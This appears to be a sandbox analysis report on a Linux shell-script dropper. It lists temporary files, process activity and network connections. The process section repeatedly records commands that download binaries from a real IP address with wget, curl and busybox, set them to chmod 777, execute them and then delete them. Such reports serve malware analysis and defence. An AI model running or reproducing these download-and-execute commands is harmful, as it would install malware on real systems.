| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
| N/A | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | N/A |
| N/A | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | N/A |
| N/A | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | N/A |
| N/A | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | N/A |
| N/A | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | N/A |
| N/A | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | N/A |
| N/A | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | N/A |
| N/A | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | N/A |
| N/A | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | N/A |
| N/A | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | N/A |
| N/A | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | N/A |
| N/A | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | N/A |
| N/A | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | N/A |
| N/A | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | N/A |
| N/A | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG | /usr/bin/curl | N/A |
Processes
/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh
[/tmp/9652b3536ccbb75a3903fb68652b2dcaa59a43553361cb914447c1c250e7aea2.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/chmod
[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/rm
[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/wget
[wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/chmod
[chmod 777 GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
[./GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/bin/rm
[rm GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6]
/usr/bin/wget
[wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/chmod
[chmod 777 xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
[./xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/bin/rm
[rm xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc]
/usr/bin/wget
[wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/chmod
[chmod 777 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
[./0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/bin/rm
[rm 0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a]
/usr/bin/wget
[wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/chmod
[chmod 777 cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
[./cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/bin/rm
[rm cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe]
/usr/bin/wget
[wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/chmod
[chmod 777 tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
[./tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/bin/rm
[rm tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0]
/usr/bin/wget
[wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/chmod
[chmod 777 tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
[./tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/bin/rm
[rm tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne]
/usr/bin/wget
[wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/chmod
[chmod 777 e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
[./e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/bin/rm
[rm e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz]
/usr/bin/wget
[wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/chmod
[chmod 777 JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
[./JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/bin/rm
[rm JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/chmod
[chmod 777 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
[./7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/bin/rm
[rm 7xcf066zx6JjlSH0geP2dCyq8I4938BMoG]
/usr/bin/wget
[wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/chmod
[chmod 777 EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
[./EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/bin/rm
[rm EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo]
/usr/bin/wget
[wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/chmod
[chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
[./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/bin/rm
[rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw]
/usr/bin/wget
[wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/chmod
[chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
[./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/bin/rm
[rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8]
/usr/bin/wget
[wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/chmod
[chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
[./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/bin/rm
[rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/chmod
[chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
[./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
/bin/rm
[rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
